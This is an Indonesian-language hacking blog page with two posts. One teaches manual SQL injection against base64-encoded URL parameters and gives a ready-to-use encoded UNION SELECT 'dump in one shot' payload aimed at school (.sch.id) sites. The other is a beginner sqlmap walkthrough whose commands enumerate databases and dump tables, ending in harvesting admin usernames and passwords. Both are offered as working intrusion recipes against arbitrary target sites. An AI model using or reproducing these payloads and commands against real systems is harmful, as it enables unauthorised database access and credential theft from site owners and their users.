SQL Injection manual url encode base-64

Oktober 29, 2022 Add Comment

 Hallo teman-teman saya kali ini akan membuat sebuah artikel tentang sql injection yang diamana pada url target titik injeksinya telah di encode menggunakan base64 oleh si admin bukan dalam bentuk angka lagi seperti ini contohnya, "http://targaetsite.com/index.php?id=MTU=". Nah itu contohnya pada contoh seperti itu kita tidak melihat sebuah angka di akhiran alamat web target yang biasanya bisa kita lakukan injeksi. 

Jika pada kasus biasa kita angka melihat sebuah angka di parameter terakir seperti ini, "http://targetsite.com/index.php?id=15". maka pada url encode base64 angka tersebut sebenernya telah di encode ke base64, sehingga pada parameter tidak terlihat angka, pada contoh diatas kode parameter angka di encode menjadi "MTU=" yang artinya adalah angka "15".

 

Untuk kasus ini cukup mudah sebagai contoh bisa lihat di bawah.

 http://targetsite.sch.id/lihat.php?id=MTU=

contoh situs target menggunakan paramter ?id=MTU yang kalo di konversi ke base64 artinya angka 15. Untuk melakukan konversi ke base64 bisa menggunakan tools yang sudah ada di hackbar baik di android atau di browser. Sedangkan untuk yang belum memiliki tools nya bisa melakukan konversi base64 dengan menggunakan website convertb64. lihat gambar dibawah sebagai contoh. Situsnya https://www.base64decode.org/ ini nama situsnya untuk melakukan decode.

   Gambar diatas memperlihatkan website base64decode.org . website tersebut melakukan decode pada parameter MTU= yang ada di website target.

JIka sudah mendapatkan parameternya kita langsung inject dengan tanda single quote ('). dan kemudian melakukan injek atau payload order by  seperti biasa nya, untuk langkah-langkahnya sama saja namun harus di lakukan encode terlebih dulu sebelum di eksekusi seperti perintah Order By, dan Union Select, dan DIOS. sehingga contoh payloadnya spererti di bawah.

http://sitetarget.sch.id/lihat.php?id=MTUnIGFuZCAwIHVuaW9uIHNlbGVjdCAxLDIsIlZ5VG92eSIsY29uY2F0KEA6PTAsKHNlbGVjdCBj
b3VudCgqKWZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmVAOj1jb25jYXQoQCwn
PGJyPicsdGFibGVfbmFtZSwnOjonLGNvbHVtbl9uYW1lKSksQCksNSw2IC0tIC0=#berita

Yang diatas adalah hasil dari encode untuk perintah print dios. dan jika berhasil maka kita akan melihat dios kita terprint di website target. seperti pada gambar di bawah.

 

 

 Karena saya lagi males. SS di komputer, maka saya hanya mengambil gambar dari hp saja yg sudah pernah saya coba. Ya sekian hanya itu untuk teknik SQLi manual untuk parameter link website yang di encrypt base64 sehingga bagi pemula kesuliatan menemukan paramter angkanya, yang sebenarnya hanya di encrypt menggunakan base64.



 

 

Cara menggunakan Sqlmap Pemula

Oktober 23, 2022 Add Comment
Cara menggunakan Sqlmap Pemula

Pada postingan kali ini saya akan post untuk cara menggunakan aplikasi sqlmap untuk hacking sql injection. Dan nanti untuk kedepannya saya juga akan membuat postingan sql injection dengan menggunakan param tamper atau yang lebih lengkap lagi, berikut kita langsung saja untuk penggunaan sqlmap dasar, ikuti langkah-langkahnya sebagai berikut.


langkah-langkah.

1. untuk perintah sqlmap kita langsung jalankan perintah di bawah.

python2 sqlmap.py -u http://target.com/page.php?id=1 --dbs

keterangan:
-u : untuk target url
--dbs : berfungsi untuk menghitung/mengambil database yang terdeteksi

2. Pada langkah ini kita akan dump table, di database yang telah kita dapat. berikut perintah yang di gunakan.

python2 sqlmap.py -u http://target.com/page.php?id=1 -D nama_database --dump

Keterangan:
-D : Perintah untuk memilih database di ikuti dengan nama database, terkadang dalam satu web server terdapat lebih dari satu database
--dump : Perintah untuk melakukan ekstrak atau mengambil semua isi dalam database yang di pilih


3. Pada langkah selanjutnya ini kita akan dump isi table setelah kita dump database dan mendapatkan  table berikut isi perintahnya. Lanjut langkah selanjtunya.

python2 sqlmap.py -u http://target.com/page.php?id=1 -D nama_database -T nama_table --columns --dump

4. Pada langkah akhir kita akan melakukan dump columns pada langkah ini isi website target yang di dump column akan terlihat semua mulai dari columns data admin, password dan lain-lain. jalankan dengan perintah berikut ini.

python2 sqlmap.py -u http://target.com/page.php?id=1 -D nama_database -T nama_table -C nama_column1,nama_columns2(contoh: password,user,email) --dump

5. Selesai Anda dapat melihat isi database milik website yang Anda lakukan pentesting dengan tools Sqlmap. pada bagian dump data terakhit itu lah Anda dapat melihat username dan password yang tersimpan di website.